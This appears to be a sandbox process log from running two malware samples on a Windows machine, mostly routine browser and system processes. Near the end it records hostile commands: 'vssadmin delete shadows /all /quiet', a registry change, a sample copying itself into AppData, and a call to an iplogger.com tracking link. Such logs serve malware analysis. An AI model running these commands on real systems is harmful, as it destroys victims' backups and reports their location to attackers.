"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27100 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {cf100be8-2294-4b67-924c-1a28b4bad1f8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2456 -prefsLen 27136 -prefMapHandle 2460 -prefMapSize 270279 -ipcHandle 2352 -initialChannelId {ea6a6bb9-2061-4fa0-81b9-96aa9f2d07b6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3872 -prefsLen 27277 -prefMapHandle 3876 -prefMapSize 270279 -jsInitHandle 3880 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3888 -initialChannelId {8cb57d87-1612-4d70-9299-0c7c3e2dd7b0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4044 -prefsLen 27277 -prefMapHandle 4048 -prefMapSize 270279 -ipcHandle 4148 -initialChannelId {934fac5d-d6b9-4071-9951-1037fe04c929} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4516 -prefsLen 34776 -prefMapHandle 4520 -prefMapSize 270279 -jsInitHandle 4524 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3104 -initialChannelId {6a3c3fc0-959c-4382-8432-5b332968fe16} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4996 -prefsLen 35013 -prefMapHandle 5000 -prefMapSize 270279 -ipcHandle 5008 -initialChannelId {9646553d-9121-4fe2-8d04-e043c3e815c8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2736 -prefsLen 32952 -prefMapHandle 2740 -prefMapSize 270279 -jsInitHandle 2744 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4088 -initialChannelId {093b4033-a523-441b-bd2f-0876a43d0606} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4092 -prefsLen 32952 -prefMapHandle 3064 -prefMapSize 270279 -jsInitHandle 3208 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5572 -initialChannelId {8e7b1b81-d775-44bc-85e3-decf504334d0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5680 -prefsLen 32952 -prefMapHandle 5684 -prefMapSize 270279 -jsInitHandle 5688 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3064 -initialChannelId {0a844bbe-c5fc-4dcf-99a9-dadc3204b4b2} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5840 -prefsLen 32952 -prefMapHandle 5844 -prefMapSize 270279 -jsInitHandle 5848 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5856 -initialChannelId {9ae096be-d918-4601-9f32-14ee8fb92ef0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5900 -prefsLen 32952 -prefMapHandle 5904 -prefMapSize 270279 -jsInitHandle 5908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5916 -initialChannelId {78b4221d-c8fb-4301-99ea-3711501afe2a} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6088 -prefsLen 32952 -prefMapHandle 6092 -prefMapSize 270279 -jsInitHandle 6096 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6104 -initialChannelId {82a4c713-8ca8-421f-81fb-6cfbc8e4de91} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6300 -prefsLen 32952 -prefMapHandle 6304 -prefMapSize 270279 -jsInitHandle 6308 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6316 -initialChannelId {4599cb2d-c725-4e90-8eaa-9f6f4d11974b} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 13 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6488 -prefsLen 32952 -prefMapHandle 6492 -prefMapSize 270279 -jsInitHandle 6496 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6504 -initialChannelId {59312b7a-b589-47f2-b759-c7b0e5224fd2} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 14 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6676 -prefsLen 32952 -prefMapHandle 6680 -prefMapSize 270279 -jsInitHandle 6684 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6692 -initialChannelId {afb744f3-a5cd-4a76-a2ea-cd3c60ca72e3} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 15 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6864 -prefsLen 32952 -prefMapHandle 6868 -prefMapSize 270279 -jsInitHandle 6872 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6880 -initialChannelId {63085a67-25bf-47c0-b959-7d3e63cd6a8d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 16 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7076 -prefsLen 32952 -prefMapHandle 7080 -prefMapSize 270279 -jsInitHandle 7084 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7088 -initialChannelId {c081b01e-9395-405b-b414-c81d68a21da6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 17 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7284 -prefsLen 32952 -prefMapHandle 7288 -prefMapSize 270279 -jsInitHandle 7292 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7300 -initialChannelId {74a5be6f-7089-4dd8-a793-e7bd280996e6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 18 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7328 -prefsLen 32952 -prefMapHandle 7316 -prefMapSize 270279 -jsInitHandle 7416 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7488 -initialChannelId {d9558668-c643-455b-a073-305d17cf2027} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 19 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7660 -prefsLen 32952 -prefMapHandle 7664 -prefMapSize 270279 -jsInitHandle 7668 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7676 -initialChannelId {91721b9e-3c1d-4f9d-b530-972ac4cf62c9} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 20 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7848 -prefsLen 32952 -prefMapHandle 7852 -prefMapSize 270279 -jsInitHandle 7856 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7864 -initialChannelId {68c2e1b8-cdb2-40c0-80a8-3fbd3b9fe732} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 21 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8036 -prefsLen 32952 -prefMapHandle 8040 -prefMapSize 270279 -jsInitHandle 8044 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8052 -initialChannelId {44f8ba09-8d1b-41c3-ae8a-6f935b52ba8f} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 22 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8228 -prefsLen 32952 -prefMapHandle 8232 -prefMapSize 270279 -jsInitHandle 8236 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8244 -initialChannelId {56eb42ed-c588-4968-ae13-5426e5cbf55b} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 23 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8440 -prefsLen 32952 -prefMapHandle 8444 -prefMapSize 270279 -jsInitHandle 8448 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8456 -initialChannelId {347f31cb-dc05-45a1-9e9c-cfcb0520cf3a} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 24 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8600 -prefsLen 32952 -prefMapHandle 8604 -prefMapSize 270279 -jsInitHandle 8608 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5628 -initialChannelId {68a142d0-e6da-4bd3-899c-c2569c0a692c} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 25 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5896 -prefsLen 32952 -prefMapHandle 5892 -prefMapSize 270279 -jsInitHandle 6036 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8644 -initialChannelId {0baa711d-8e72-487e-b860-8b6e42b71519} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 26 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8764 -prefsLen 32952 -prefMapHandle 8768 -prefMapSize 270279 -jsInitHandle 8772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8776 -initialChannelId {e5de97bf-f7fe-4890-b67f-d106e8431157} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 27 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8948 -prefsLen 32952 -prefMapHandle 8952 -prefMapSize 270279 -jsInitHandle 8956 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8964 -initialChannelId {b10f0107-0a23-4f05-8108-5774f6e1aab1} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 28 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7036 -prefsLen 32952 -prefMapHandle 7032 -prefMapSize 270279 -jsInitHandle 7028 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7016 -initialChannelId {07c18d23-d063-4651-b5b1-7a2bbaa160a5} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 29 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7656 -prefsLen 32952 -prefMapHandle 7632 -prefMapSize 270279 -jsInitHandle 7628 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7620 -initialChannelId {b429cafd-bdfa-4c8c-8539-d5807be5c49d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 30 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7604 -prefsLen 32952 -prefMapHandle 7504 -prefMapSize 270279 -jsInitHandle 7516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7316 -initialChannelId {629840ce-9743-49bd-90e6-2165e5079fde} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 31 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9312 -prefsLen 32952 -prefMapHandle 9316 -prefMapSize 270279 -jsInitHandle 9320 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9332 -initialChannelId {6d49cf93-407e-430d-b55f-f3b334e11bf0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 32 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9344 -prefsLen 32952 -prefMapHandle 9348 -prefMapSize 270279 -jsInitHandle 9352 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9364 -initialChannelId {d6577547-e3e4-4cf3-b477-a9a14dbebd2d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 33 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9376 -prefsLen 32952 -prefMapHandle 9380 -prefMapSize 270279 -jsInitHandle 9384 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9396 -initialChannelId {e776b697-df1c-4a1d-812d-7309cb88b64e} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 34 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9880 -prefsLen 32952 -prefMapHandle 9884 -prefMapSize 270279 -jsInitHandle 9888 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9896 -initialChannelId {72582720-248b-4daa-b2a7-b64694aa2aba} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 35 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9908 -prefsLen 32952 -prefMapHandle 9912 -prefMapSize 270279 -jsInitHandle 9916 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9928 -initialChannelId {8d2cf194-9c33-46cd-aeb3-d22eb2e88bd8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 36 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9940 -prefsLen 32952 -prefMapHandle 9944 -prefMapSize 270279 -jsInitHandle 9948 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9956 -initialChannelId {31a6a4b3-960f-4aaf-878c-7208dc251229} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 37 tab
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=6308,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=4840,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3376 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=6684,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3456,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2988 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\" -ad -an -ai#7zMap30351:190:7zEvent13546
C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe
"C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe"
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" "/rC:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe"
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5012,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5424,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6404 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\" -ad -an -ai#7zMap21626:190:7zEvent4642
C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe
"C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/2De1W6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://iplogger.com/2De1W6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=7356,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=7468,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5752 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
